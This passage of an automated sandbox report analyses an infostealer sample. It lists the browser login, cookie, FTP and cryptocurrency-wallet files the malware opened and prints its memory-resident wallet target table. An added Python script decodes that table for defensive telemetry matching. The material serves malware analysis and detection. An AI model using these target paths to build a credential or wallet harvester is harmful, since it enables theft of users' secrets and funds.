Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: Yara match File source: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR
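The wallet target list recovered from memory above is a flat, pipe-delimited rule table: display name, base-folder code, sub-directory, file mask, recursive flag, repeated for every wallet. The "File opened" lines that follow it are simply those rules resolved against the sandbox user's profile (Coinomi, code 0, is opened under AppData\Local; Electrum, code 1, under AppData\Roaming). The script below is an added example, not code from the report or from the malware, that decodes an excerpt of that string into rules, resolves each to the directory the stealer will enumerate, and tells you whether a given file path falls inside a rule's scope. The field order and the meaning of codes 0 and 1 are inferred from the string and the report's own paths; mapping code 2 to %USERPROFILE% is an assumption (only the \.chia\ entries use it), the sandbox roots are constructed to match the report's paths, and the excerpt starts mid-record exactly as the report's copy does.

```python
"""Decode the wallet-grabber rule list the report found in process memory.

Each rule is five pipe-separated fields: display name, base-folder code,
sub-directory, file mask, recursive flag. Field order and the meaning of
codes 0/1 were inferred from the string and the report's 'File opened' lines;
code 2 -> %USERPROFILE% is an assumption (only the .chia entries use it).
"""
from dataclasses import dataclass
from fnmatch import fnmatchcase
import ntpath

# Excerpt of the rule string quoted in the report, shortened to a handful of
# entries. The report's copy starts mid-record ("|\Raven\|..."), so the first
# record carries only its last three fields.
CONFIG_EXCERPT = (
    r"|\Raven\|*wallet*.dat|0"
    r"|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0"
    r"|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1"
    r"|Electrum|1|\Electrum\wallets\|*.*|0"
    r"|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0"
    r"|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0"
    r"|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|"
)

# Base-folder code -> environment variable. 0 and 1 are confirmed by the
# report (Coinomi opened under AppData\Local, Electrum under AppData\Roaming);
# 2 -> USERPROFILE is an assumption.
BASE_ROOTS = {"0": "LOCALAPPDATA", "1": "APPDATA", "2": "USERPROFILE"}

# Constructed roots matching the sandbox user seen in the report's paths.
SANDBOX_ROOTS = {
    "LOCALAPPDATA": "C:\\Users\\user\\AppData\\Local",
    "APPDATA": "C:\\Users\\user\\AppData\\Roaming",
    "USERPROFILE": "C:\\Users\\user",
}

FIELDS = 5


@dataclass(frozen=True)
class GrabberRule:
    name: str
    base: str       # key into BASE_ROOTS
    subdir: str     # begins and ends with a backslash
    mask: str       # Win32 wildcard pattern
    recursive: bool


def parse_grabber_config(blob):
    """Split the pipe-delimited blob into (partial_leading_fields, rules).

    A leading fragment shorter than one record is returned separately instead
    of being silently mis-aligned with the records that follow it.
    """
    tokens = blob.split("|")
    if tokens and tokens[0] == "":
        tokens = tokens[1:]          # blob begins with a delimiter
    if tokens and tokens[-1] == "":
        tokens = tokens[:-1]         # blob ends with a delimiter
    lead = len(tokens) % FIELDS      # fields left over from a cut-off record
    partial = tokens[:lead]
    rules = []
    for i in range(lead, len(tokens), FIELDS):
        name, base, subdir, mask, rec = tokens[i:i + FIELDS]
        rules.append(GrabberRule(name, base, subdir, mask, rec == "1"))
    return partial, rules


def target_dir(rule, roots=SANDBOX_ROOTS):
    """Absolute directory the rule enumerates (the report's 'File opened' paths)."""
    return roots[BASE_ROOTS[rule.base]] + rule.subdir


def match_rule(path, rules, roots=SANDBOX_ROOTS):
    """Return the first rule that would collect `path`, or None.

    Non-recursive rules only cover files directly inside their directory.
    Comparison is case-insensitive, as NTFS lookups are. Win32 FindFirstFile
    treats "*.*" as "every file"; fnmatch would demand a dot, so translate it.
    """
    p = path.lower()
    for rule in rules:
        base = target_dir(rule, roots).lower()
        if not p.startswith(base):
            continue
        rest = p[len(base):]
        if not rest:
            continue                 # the directory itself, not a file in it
        if not rule.recursive and "\\" in rest:
            continue
        mask = "*" if rule.mask == "*.*" else rule.mask.lower()
        if fnmatchcase(ntpath.basename(rest), mask):
            return rule
    return None


if __name__ == "__main__":
    partial, rules = parse_grabber_config(CONFIG_EXCERPT)
    print("cut-off leading fields:", partial)
    for r in rules:
        flag = "recursive" if r.recursive else "top-level"
        print(f"{r.name:18} {target_dir(r)}{r.mask}  ({flag})")
```

Feeding the full string from the report into `parse_grabber_config` yields the complete target list; the resolved directories are the ones to watch for in file-access telemetry, and `match_rule` lets you check whether a path seen in EDR or Sysmon data would have been in scope for this sample's configuration.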

Remote Access Functionality

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0.2.7ZthFNAqYp.exe.27e0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.7ZthFNAqYp.exe.833b9e.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.7ZthFNAqYp.exe.920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.7ZthFNAqYp.exe.920000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.7ZthFNAqYp.exe.833b9e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.7ZthFNAqYp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB90C40 sqlite3_bind_zeroblob, 2_2_6CB90C40
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB90D60 sqlite3_bind_parameter_name, 2_2_6CB90D60
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAB8EA0 sqlite3_clear_bindings, 2_2_6CAB8EA0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB90B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 2_2_6CB90B40
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAB6410 bind,WSAGetLastError, 2_2_6CAB6410
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAB60B0 listen,WSAGetLastError, 2_2_6CAB60B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CABC030 sqlite3_bind_parameter_count, 2_2_6CABC030
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAB6070 PR_Listen, 2_2_6CAB6070
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CABC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 2_2_6CABC050
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CA422D0 sqlite3_bind_blob, 2_2_6CA422D0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAB63C0 PR_Bind, 2_2_6CAB63C0
Note: the sqlite3_bind_* and sqlite3_clear_bindings routines listed here are SQLite statement-parameter binders and have nothing to do with sockets; they appear only because the heuristic keys on the substring "bind". The genuine listening primitives are bind/listen (Winsock) and PR_Bind/PR_Listen (NSPR, the runtime bundled with Mozilla's NSS library that credential stealers typically load to read Firefox profile data). All of these addresses sit in the 0x6CA00000 region of a loaded library rather than in the unpacked payload at 0x920000, so this section is weak evidence of a backdoor listener in the stealer itself; treat the browser and wallet harvesting above as the primary behaviour.